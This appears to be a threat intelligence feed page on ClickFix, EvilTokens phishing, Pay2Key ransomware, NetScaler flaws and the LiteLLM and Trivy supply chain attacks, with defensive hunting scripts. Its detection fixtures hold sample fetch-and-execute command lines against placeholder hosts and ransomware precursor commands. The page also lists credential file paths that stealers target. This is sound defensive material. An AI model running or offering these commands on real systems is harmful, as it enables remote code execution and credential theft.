TIGR Threat Watch

Threat Watch Feed

🚩 – IOCs Added

The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.

🚩 Recorded Future Details Five ClickFix Social Engineering Clusters Targeting Windows and macOS

Recorded Future’s Insikt Group published research identifying five distinct ClickFix activity clusters targeting Windows and macOS systems. The clusters include lures impersonating Intuit QuickBooks, Booking.com, and Birdeye, along with dual-platform and macOS-focused variants. Insikt Group states the activity has been observed since at least May 2024 and assesses that ClickFix has evolved from a niche tactic into a standardized initial access method used across multiple threat actor ecosystems. The campaigns target a range of sectors, including accounting, travel, real estate, and legal services. ClickFix relies on social engineering to persuade users to copy, paste, or manually execute obfuscated commands in trusted tools such as the Windows Run dialog, PowerShell, or macOS Terminal. Across the clusters, Insikt Group observed a common four-stage pattern: obfuscated input, native execution through legitimate system shells or LOLBins, remote retrieval from attacker-controlled infrastructure, and immediate in-memory execution. On Windows, clusters delivered payloads including NetSupport RAT and used Startup-folder persistence. On macOS, campaigns used encoded terminal commands and infrastructure associated with MacSync. Insikt Group notes the technique’s core value is that it shifts execution to user-assisted actions, helping it evade traditional browser-based protections and some endpoint controls.

Impact: ClickFix increases initial access risk by exploiting normal user behavior and trusted native utilities rather than browser exploits or traditional malware delivery alone. This can allow threat actors to execute remote code, establish persistence, and deliver secondary payloads with limited early forensic artifacts. Because the methodology is reusable across brands, sectors, and operating systems, organizations may face recurring exposure even when individual domains or lures are blocked.

Recommendation: Disable the Windows Run dialog and Win+R shortcut through Group Policy where operationally feasible. Implement PowerShell Constrained Language Mode and use AppLocker or Windows Defender Application Control to restrict unapproved script execution and LOLBin abuse. On macOS, restrict Terminal and shell interpreter use through MDM-enforced application control policies and apply endpoint controls that limit unauthorized script execution. Hunt for suspicious command patterns involving obfuscated PowerShell, encoded shell commands, Invoke-RestMethod plus Invoke-Expression behavior, and unexpected use of tools such as xxd, nohup, zsh, or bash for staged downloads. Monitor for Startup folder persistence, shortcut modification, and remote retrieval of staging files or scripts from newly observed infrastructure. Conduct user awareness training focused on fake human-verification prompts and any workflow requiring users to paste commands into Run, PowerShell, or Terminal. Where available, use intelligence monitoring to identify brand impersonation, newly registered lookalike domains, and recurring HTML or DOM artifacts associated with ClickFix infrastructure.

🚩 Huntress Details EvilTokens Phishing-as-a-Service Abusing Railway[.]com PaaS for Microsoft 365 Device Code Attacks

Huntress reported an active Microsoft 365-focused phishing campaign leveraging Railway[.]com infrastructure, first observed on February 19, 2026, with significant acceleration beginning March 2, 2026. The activity has impacted over 340 organizations across the United States, Canada, Australia, New Zealand, and Germany. As of March 23, Huntress attributed the activity to the EvilTokens phishing-as-a-service platform, which provides tooling for credential harvesting, phishing delivery, and infrastructure management. The campaign uses OAuth device code phishing to trick users into authenticating attacker-controlled sessions via legitimate Microsoft endpoints. Victims are directed through multi-stage phishing chains, often involving trusted platforms, compromised websites, and security vendor URL rewriters to evade detection. Once a victim enters a device code, attackers obtain valid OAuth access and refresh tokens, enabling persistent access without needing credentials or bypassing MFA. Railway infrastructure is used to host token replay and authentication activity, leveraging trusted cloud IP space to avoid risk-based detection.

Impact: This campaign enables persistent unauthorized access to Microsoft 365 environments, even after password resets, due to reliance on valid OAuth tokens. Organizations face elevated risk of business email compromise, data exfiltration, and financial fraud, particularly in sectors handling sensitive communications or transactions. The scale, infrastructure reuse, and evasion techniques reduce the effectiveness of traditional email and domain-based defenses, shifting detection requirements to identity and authentication layers.

Recommendation: Hunt for successful authentications from Railway IP ranges (162.220.232.0/22 and 162.220.234.0/22) in Entra ID or SIEM logs. Revoke refresh tokens for any potentially impacted users and investigate associated sessions. Block or restrict authentication from Railway infrastructure using Conditional Access if not business-required. Disable or tightly restrict OAuth device code authentication flows to only required users. Require compliant or managed devices for access to Microsoft 365 services such as Exchange Online and SharePoint. Enable Continuous Access Evaluation (CAE) to reduce token abuse windows. Monitor for anomalous user agents, including synthetic or inconsistent device identifiers. Train users to recognize device code phishing scenarios, including prompts to enter codes into legitimate Microsoft login pages.
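The Railway range hunt from the recommendation above, as an added example that is not from the Huntress report: it checks constructed sign-in records against the two CIDRs and separates successful sign-ins from failed attempts. The field names are an assumption modelled on the Entra ID sign-in log schema, and the sample records are constructed.

```python
import ipaddress

# Railway ranges quoted in the recommendation above. strict=False is required because
# 162.220.234.0 is not aligned to a /22 boundary; ipaddress then normalizes that entry
# to 162.220.232.0/22, so both entries as written resolve to the same block.
RAILWAY_RANGES = [
    ipaddress.ip_network(cidr, strict=False)
    for cidr in ("162.220.232.0/22", "162.220.234.0/22")
]

# Constructed sample sign-in records (not from the page). Field names are an
# assumption modelled on the Entra ID sign-in log schema.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "a.user@example.com", "ipAddress": "162.220.233.17",
     "status": {"errorCode": 0}, "authenticationProtocol": "deviceCode"},
    {"userPrincipalName": "b.user@example.com", "ipAddress": "203.0.113.5",
     "status": {"errorCode": 0}, "authenticationProtocol": "authorizationCodeFlow"},
    {"userPrincipalName": "c.user@example.com", "ipAddress": "162.220.235.200",
     "status": {"errorCode": 50126}, "authenticationProtocol": "deviceCode"},
    {"userPrincipalName": "d.user@example.com", "ipAddress": "162.220.236.1",
     "status": {"errorCode": 0}, "authenticationProtocol": "authorizationCodeFlow"},
    {"userPrincipalName": "e.user@example.com", "ipAddress": "not-an-ip",
     "status": {"errorCode": 0}, "authenticationProtocol": "deviceCode"},
]


def from_railway(ip: str) -> bool:
    """True if the address falls inside the Railway ranges; malformed input is not a hit."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in RAILWAY_RANGES)


def hunt_railway_signins(signins):
    """Return two lists of (upn, ip, protocol): successful sign-ins from Railway space,
    which are the hunt target, and failed attempts from the same space for triage."""
    successes, failures = [], []
    for rec in signins:
        if not from_railway(rec.get("ipAddress", "")):
            continue
        row = (rec["userPrincipalName"], rec["ipAddress"], rec.get("authenticationProtocol", ""))
        if rec.get("status", {}).get("errorCode") == 0:
            successes.append(row)
        else:
            failures.append(row)
    return successes, failures
```

Because the second prefix is not /22-aligned, confirm the intended ranges against the Huntress source before turning this into a production rule.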

🚩 Pay2Key Iranian-Linked Ransomware Targets U.S. Healthcare in Latest Resurgence

Halcyon and Beazley Security reported on a February 2026 Pay2Key ransomware intrusion at a U.S. healthcare organization, assessing the activity as part of the group’s renewed operations amid heightened Iran-related geopolitical tensions. Investigators found the threat actor maintained access to a compromised admin account for several days, then used TeamViewer, credential theft tools including Mimikatz, LaZagne, and ExtPassword, and network discovery utilities to expand access and prepare for deployment. The ransomware was delivered through a staged self-extracting archive that decrypted components in memory, registered a fake Avast Antivirus instance with Windows Security Center to suppress Defender, and then systematically suspended BitLocker, shut down Hyper-V virtual machines, unmounted virtual disks, disabled recovery mechanisms, deleted backup catalogs, and cleared event logs. The observed variant was described as a significant upgrade from mid-2025 activity, with stronger evasion, execution, and anti-forensic tradecraft, and investigators notably found no evidence of data exfiltration during this intrusion.

Impact: This intrusion demonstrates that Pay2Key remains capable of quickly converting privileged access into large-scale operational impact, with a workflow designed to weaken endpoint defenses, eliminate backup and recovery paths, and accelerate encryption across both physical and virtual infrastructure. The absence of observed exfiltration suggests the group may be willing to prioritize destructive impact over conventional double-extortion pressure in some cases. Given the group’s history of targeting organizations aligned with Iranian state interests and the apparent correlation between its activity and regional conflict, Pay2Key continues to present both ransomware risk and potential strategic disruption risk.

Recommendation: Treat Pay2Key as an unpredictable, politically motivated threat that intensifies operations during periods of U.S.-Iran geopolitical tension. Organizations should hunt for the specific execution chains identified in this report, particularly the use of wsc_proxy.exe with the /wsc_name:“Avast Antivirus” argument, which indicates an active attempt to spoof the Windows Security Center. Security teams must monitor for the unauthorized deployment of the “Everything.exe” file search utility and sudden power configuration changes (powercfg.exe) that disable hibernation. Finally, defenders should alert on any PowerShell commands attempting to suspend BitLocker (Suspend-BitLocker) or stop/dismount Hyper-V virtual machines (Stop-VM, Dismount-DiskImage), as these are immediate precursors to the encryption phase.
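The hunting guidance in the ClickFix recommendation earlier on this page and in the Pay2Key recommendation above both come down to pattern matching over process command lines. The following is an added example, not code from either report, that encodes those patterns as rules and runs them over constructed process-creation events; the regexes, the sample command lines and the hostnames are assumptions (irm and iex are the built-in PowerShell aliases for Invoke-RestMethod and Invoke-Expression).

```python
import re

# Command-line hunting rules distilled from the ClickFix and Pay2Key recommendations.
# Each entry: (rule name, regex applied to the full process command line).
RULES = [
    # ClickFix: remote retrieval piped straight into Invoke-Expression (irm/iex aliases)
    ("clickfix_irm_iex", re.compile(
        r"(?i)\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr)\b.*\|\s*(Invoke-Expression|iex)\b")),
    # ClickFix: encoded PowerShell command blob
    ("clickfix_encoded_ps", re.compile(
        r"(?i)powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    # ClickFix on macOS: shell, xxd or nohup used to stage a download
    ("clickfix_macos_staged", re.compile(r"(?i)\b(xxd|nohup|zsh|bash)\b.*\b(curl|base64)\b")),
    # Pay2Key: fake Avast registration with Windows Security Center
    ("pay2key_wsc_spoof", re.compile(r'(?i)wsc_proxy\.exe.*/wsc_name:["”]?Avast Antivirus')),
    ("pay2key_bitlocker", re.compile(r"(?i)\bSuspend-BitLocker\b")),
    ("pay2key_hyperv", re.compile(r"(?i)\b(Stop-VM|Dismount-DiskImage)\b")),
    ("pay2key_hibernate_off", re.compile(r"(?i)powercfg(\.exe)?\s+[/-]h(ibernate)?\s+off")),
    ("pay2key_everything", re.compile(r"(?i)\bEverything\.exe\b")),
]

# Constructed sample process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", 'powershell -w hidden -c "irm https://example.invalid/v.txt | iex"'),
    ("WS03", "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),  # placeholder blob
    ("MAC02", '/bin/bash -c "curl -fsSL https://example.invalid/p | base64 -d | nohup zsh &"'),
    ("SRV01", r'C:\Temp\wsc_proxy.exe /wsc_name:"Avast Antivirus" /run'),
    ("SRV01", "powershell.exe -Command Suspend-BitLocker -MountPoint C: -RebootCount 0"),
    ("HV01", r'powershell.exe -Command "Get-VM | Stop-VM -Force; Dismount-DiskImage -ImagePath D:\vm.vhdx"'),
    ("SRV01", "powercfg.exe /hibernate off"),
    ("SRV01", r"C:\Users\Public\Everything.exe -startup"),
    ("WS02", "powershell.exe -Command Get-Process"),  # benign, should not match
]


def hunt_commands(events):
    """Return (host, rule_name) for every event/rule pair that matches."""
    hits = []
    for host, cmd in events:
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((host, name))
    return hits
```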

Citrix NetScaler vulnerabilities enable unauthenticated data exposure and session mix-up risks in SAML and gateway configurations

Citrix published a security bulletin on March 23, 2026, disclosing two vulnerabilities affecting NetScaler ADC and NetScaler Gateway: CVE-2026-3055 and CVE-2026-4368. The most severe, CVE-2026-3055 (CVSS 9.3), is an out-of-bounds read vulnerability that can allow an unauthenticated remote attacker to access sensitive information from appliance memory. The issue affects customer-managed NetScaler instances configured as a SAML Identity Provider (IdP), which is commonly used for single sign-on deployments. CVE-2026-4368 (CVSS 7.7) is a race condition vulnerability that can result in user session mix-ups when the appliance is configured as a gateway or AAA virtual server. According to vendor and third-party reporting, exploitation of CVE-2026-3055 does not require authentication and targets exposed NetScaler appliances with SAML IdP functionality enabled. While no active exploitation or public proof-of-concept has been reported at the time of disclosure, similar NetScaler vulnerabilities have historically been widely exploited once technical details became available. The vulnerabilities impact multiple supported versions prior to patched releases, and Citrix has issued updates addressing both issues.

Impact: The primary risk is exposure of sensitive information from memory on internet-facing NetScaler appliances, which could include authentication material or session data, depending on deployment. In environments using SAML for authentication, this increases the risk of credential compromise and downstream access to internal systems. The session mix-up vulnerability may also affect user integrity and session isolation in gateway deployments. Given the critical role of NetScaler in identity and remote access workflows, successful exploitation could enable further intrusion activity or compromise of authentication flows.

Recommendation: Organizations should review the source material and assess exposure. Priority actions include upgrading NetScaler ADC and NetScaler Gateway to patched versions, particularly for systems configured as SAML IdPs, gateways, or AAA virtual servers. Inventory externally accessible NetScaler appliances, verify configuration settings such as SAML IdP profiles, and monitor for anomalous authentication behavior or unexpected session activity.

🚩 LiteLLM PyPI Supply Chain Attack Exfiltrates Cloud Credentials and Cryptocurrency Wallets via Compromised Maintainer Account

OX Security researchers disclosed a supply chain attack on LiteLLM Python library versions 1.82.7 and 1.82.8 on March 24, 2026, following the compromise of a maintainer’s PyPI account by threat actor TeamPCP. LiteLLM is an open-source Python library providing unified interfaces to call over 100 large language models including OpenAI, Anthropic, and VertexAI using standardized input/output formats. The malicious versions contained an infostealer targeting AWS, GCP, GitHub, SSH keys, and cryptocurrency wallets including Bitcoin, Litecoin, Ethereum, and Solana. With over 3 million daily downloads, the compromise potentially affected a large number of users during the approximately 24-hour period before the malicious versions were removed. The attack deployed three layers of base64-encoded payloads through a malicious .pth Python configuration file, with the final stage exfiltrating stolen credentials to the command-and-control server models.litellm.cloud after encrypting the data with hardcoded OpenSSL keys.

Impact: This supply chain compromise exposed developers and organizations to widespread credential theft through a trusted dependency. Affected systems may have had cloud access keys, infrastructure secrets, communication platform tokens, and cryptocurrency wallet data exfiltrated. Because the malicious logic executed during normal package use, organizations may not have immediate visibility into compromise, increasing the risk of unauthorized access, lateral movement, and financial loss. The malware searches and extracts SSH keys from ~/.ssh/ directories including id_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, known_hosts, and config files. Kubernetes credentials are harvested from /etc/kubernetes/admin.conf, controller-manager.conf, scheduler.conf, and service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/ paths. Google Cloud credentials are stolen from ~/.config/gcloud/ and /root/.config/gcloud/application_default_credentials.json, while Azure credentials are extracted from /.azure directories. The infostealer reads user command history, npmrc, mongorc configurations, and database credentials for LDAP, Redis, MySQL, PostgreSQL, and Postfix installations.

Recommendation: Identify and remove LiteLLM versions 1.82.7 and 1.82.8 from all environments. Rotate all potentially exposed credentials, including cloud provider keys, SSH keys, API tokens, database credentials, and communication platform tokens. Pin dependencies to specific safe versions using exact version numbers rather than unpinned or caret-range specifications that automatically install newer releases. Review installation configurations for unpinned LiteLLM dependencies specified as “litellm” or range-based pins like “litellm^=1.82.6” that would have pulled malicious versions. Audit systems for indicators of compromise, including connections to models[.]litellm[.]cloud and checkmarx[.]zone. Review dependency management practices and pin packages to known safe versions to prevent automatic installation of malicious updates. Inspect systems for unauthorized access to sensitive files such as SSH key directories, Kubernetes configurations, and cloud credential stores. Monitor for suspicious outbound traffic and unusual access patterns involving developer tools and infrastructure resources. Implement least privilege access controls and limit credential exposure within development environments.
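An added example, not from the OX Security report, of the dependency review the recommendation above calls for: it scans a pip requirements file and reports which litellm lines could resolve to 1.82.7 or 1.82.8. The sample requirements are constructed, and only the common pip specifier forms are evaluated; anything else is surfaced for manual review.

```python
import re

MALICIOUS_VERSIONS = [(1, 82, 7), (1, 82, 8)]  # releases named in the report

# Constructed sample requirements (not from the page). The "^=" line reproduces the form
# quoted above; it is not valid pip syntax, so it is surfaced for manual review.
SAMPLE_REQUIREMENTS = """\
litellm                      # unpinned: resolves to the newest release
litellm>=1.82.6
litellm~=1.82.6              # compatible release: >=1.82.6, ==1.82.*
litellm[proxy]==1.82.7       # exact pin on a malicious version
litellm==1.82.6
litellm>=1.82.0,<1.82.7
litellm^=1.82.6
"""

# Each pip operator as a predicate over (candidate, specified) version tuples.
OPS = {
    "==": lambda v, s: v == s,
    ">=": lambda v, s: v >= s,
    ">": lambda v, s: v > s,
    "<=": lambda v, s: v <= s,
    "<": lambda v, s: v < s,
    "~=": lambda v, s: v >= s and v[: len(s) - 1] == s[:-1],
}
CLAUSE_RE = re.compile(r"(==|>=|<=|~=|>|<)\s*(\d+(?:\.\d+)*)$")
REQ_RE = re.compile(r"^([A-Za-z0-9_.\-]+)(?:\[[^\]]*\])?\s*(.*)$")  # name, optional extras, spec


def parse_version(text):
    return tuple(int(p) for p in text.split("."))


def version_allowed(version, spec):
    """True if `spec` (e.g. ">=1.82.0,<1.82.7") permits `version`; ValueError if unsupported."""
    if not spec.strip():
        return True  # no specifier: the resolver may pick any release
    for clause in spec.split(","):
        m = CLAUSE_RE.match(clause.strip())
        if not m:
            raise ValueError(f"unsupported specifier: {clause.strip()!r}")
        if not OPS[m.group(1)](version, parse_version(m.group(2))):
            return False
    return True


def audit_requirements(text, package="litellm"):
    """Return (line, exposed_versions) per matching line; exposed_versions is None when
    the specifier could not be evaluated and needs manual review."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = REQ_RE.match(line)
        if not line or not m or m.group(1).lower() != package:
            continue
        try:
            exposed = [".".join(map(str, v)) for v in MALICIOUS_VERSIONS
                       if version_allowed(v, m.group(2))]
        except ValueError:
            exposed = None
        findings.append((line, exposed))
    return findings
```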

Microsoft Details Supply Chain Compromise of Aqua Security Trivy Vulnerability Scanner

Microsoft Defender Security Research reported that on March 19, 2026, Aqua Security’s open-source vulnerability scanner Trivy was compromised in a CI/CD-focused supply chain attack. According to Microsoft, attackers used access from a prior incident that was not fully remediated to tamper with trusted Trivy distribution channels. The activity affected the Trivy core binary, the trivy-action GitHub Action, and the setup-trivy GitHub Action. Microsoft further notes the campaign has since expanded to additional frameworks, including Checkmarx KICS and LiteLLM, though reporting on that broader activity is still developing. The attack abused mutable GitHub tags and compromised credentials with tag write access to force-push malicious commits behind trusted version references in trivy-action and setup-trivy. In parallel, attackers triggered release automation to publish a malicious Trivy binary, v0.69.4, to official distribution channels. On compromised self-hosted GitHub Actions runners, Microsoft observed malware performing process discovery, decoding a Python-based credential stealer, harvesting cloud, Kubernetes, CI/CD, infrastructure, database, and application secrets, encrypting the stolen data, and exfiltrating it to the typosquatted domain scan.aquasecurtiy[.]org. The malware then launched the legitimate Trivy scan so the workflow appeared to complete normally. Microsoft attributes the activity to TeamPCP and states maintainers removed the malicious artifacts later on March 19, ending the active propagation phase.

Impact: This compromise turned trusted security tooling into an access and credential theft mechanism inside build pipelines and developer environments. Organizations using affected Trivy components risk exposure of cloud credentials, Kubernetes secrets, CI/CD secrets, infrastructure access data, and other sensitive material present on runners or developer systems. Because the malicious tooling preserved expected scan behavior, impacted environments may not have obvious operational signs of compromise even where secret theft occurred.

Recommendation: Verify Trivy-related components and update to safe versions identified by Microsoft: Trivy binary v0.69.2 through v0.69.3, trivy-action v0.35.0, and setup-trivy v0.2.6. Review workflows for any use of tag-based GitHub Action references and replace them with verified commit SHAs. Audit CI/CD pipelines for overprivileged GITHUB_TOKEN usage and reduce token and credential permissions to the minimum required. Investigate self-hosted GitHub Actions runners for signs of process discovery, environment variable dumping, metadata service access, Kubernetes secret enumeration, curl-based exfiltration, and references to scan.aquasecurtiy[.]org, 45.148.10.212, /tmp/runner_collected_, or tpcp.tar.gz. Rotate secrets that may have been exposed in affected pipelines, including cloud credentials, Kubernetes service account material, CI/CD tokens, webhook URLs, SSH-related secrets, and database connection strings. Avoid unnecessary exposure of secrets through environment variables and retrieve secrets just in time from dedicated secret managers. Use ephemeral or clean runners and ensure credentials are not persisted across jobs. Restrict third-party action usage through policy controls and allow only approved actions by default. Use available detection content and advanced hunting queries to identify affected hosts, malicious commands, suspicious network activity, and compromised Trivy installations.
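An added example, not Microsoft’s or Aqua’s code, of the workflow review the recommendation above describes: it lists every `uses:` reference in a GitHub Actions workflow that is not pinned to a 40-character commit SHA and marks the two affected Trivy actions. The workflow text and the all-“a” SHA are constructed placeholders.

```python
import re

# The two GitHub Actions the report names as affected.
AFFECTED_ACTIONS = {"aquasecurity/trivy-action", "aquasecurity/setup-trivy"}

# Constructed sample workflow (not from any real repository); the 40 x "a" SHA is a placeholder.
SAMPLE_WORKFLOW = """\
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/setup-trivy@v0.2.6
      - uses: aquasecurity/trivy-action@0.35.0   # a tag, even a safe one, can be moved
      - uses: aquasecurity/trivy-action@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  # v0.35.0
      - uses: ./.github/actions/local-step
      - uses: docker://ghcr.io/example/image:1.2
      - run: trivy fs .
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def classify(ref):
    """Classify one `uses:` reference by how it is pinned."""
    if ref.startswith("./"):
        return "local"        # lives in the same repository; not a remote tag
    if ref.startswith("docker://"):
        return "docker"       # image references need digest pinning, a separate check
    if "@" not in ref:
        return "no-ref"       # resolves to the action's default branch
    _, _, version = ref.rpartition("@")
    return "sha-pinned" if SHA_RE.match(version) else "mutable-ref"


def audit_workflow(text):
    """Return (ref, kind, affected) for every remote action not pinned to a commit SHA."""
    findings = []
    for line in text.splitlines():
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        kind = classify(ref)
        if kind in ("mutable-ref", "no-ref"):
            action = ref.rpartition("@")[0] if "@" in ref else ref
            findings.append((ref, kind, action.lower() in AFFECTED_ACTIONS))
    return findings
```

A SHA pin only helps when the SHA was taken from the upstream repository’s own history, so verify it there before committing the replacement.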


About TIGR Threat Watch

Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.